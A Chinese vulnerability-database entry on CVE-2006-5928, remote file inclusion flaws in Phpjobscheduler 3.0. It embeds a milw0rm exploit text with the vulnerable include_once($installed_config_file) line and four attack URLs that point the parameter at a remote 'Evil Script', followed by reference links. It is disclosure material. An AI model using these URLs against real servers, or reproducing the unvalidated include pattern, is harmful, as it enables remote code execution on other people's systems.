PHPJobscheduler多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111534 漏洞类型 输入验证
发布时间 2006-11-13 更新时间 2006-11-16
CVE编号 CVE-2006-5928 CNNVD-ID CNNVD-200611-253
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2775
https://cxsecurity.com/issue/WLB-2006110072
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-253
|漏洞详情
Phpjobscheduler存在多个PHP远程文件包含漏洞,远程攻击者可以通过传给(1)add-modify.php,(2)delete.php,(3)modify.php和(4)phpjobscheduler.php的installed_config_file参数内的URL执行任意PHP代码。
|漏洞EXP
======================================================================
# Phpjobscheduler 3.0  - Multiple Remote File Include by Firewall
                     

# Application Affect:
                   phpjobscheduler 3.0

# Source Code:            
                   http://scripts.ringsworld.com/development-tools/phpjobscheduler.v3.0.zip

# Code:
                   include_once($installed_config_file)
       
# ExPloit :
   http://www.site.com/phpjobschedule_PATH/add-modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/delete.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/modify.php?installed_config_file=[Evil Script]
http://www.site.com/phpjobschedule_PATH/phpjobscheduler.php?installed_config_file=[Evil Script]


# Contact:   
                   Firewall1954@hotmail.com

# GrEatZ :

|Her0|slackwaren|Ozzmadark|slappter|ArCaX-ATH|CiberPunk|saok|
|Cvir.System|napster|Matasanos|Zlevyn|Azrael|CyberAlexis|
|NitroNet|Matasanos|SysRoot|_ANtrAX_|FaLENcE|Mnox|Xneo.System|

 "El ceviche y El pisco es peruano y jamas podran igualar su calidad"
                         "Viva el Peru"

======================================================================

# milw0rm.com [2006-11-13]
|参考资料

来源:BID
名称:21041
链接:http://www.securityfocus.com/bid/21041
来源:BUGTRAQ
名称:20061112Phpjobscheduler3.0-MultipleRemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/451360/100/0/threaded
来源:MILW0RM
名称:2775
链接:http://www.milw0rm.com/exploits/2775
来源:SECUNIA
名称:22855
链接:http://secunia.com/advisories/22855
来源:OSVDB
名称:30367
链接:http://www.osvdb.org/30367
来源:OSVDB
名称:30366
链接:http://www.osvdb.org/30366
来源:OSVDB
名称:30365
链接:http://www.osvdb.org/30365
来源:OSVDB
名称:30364
链接:http://www.osvdb.org/30364
来源:www.dwalker.co.uk
链接:http://www.dwalker.co.uk/forum/viewtopic.php?t=564
来源:SECTRACK
名称:1017264
链接:http://securitytracker.com/id?1017264
来源:SREASON
名称:1869
链接:http://securityreason.com/securityalert/1869
来源:MILW0RM
名称:2775
链接:http://milw0rm.com/exploits/2775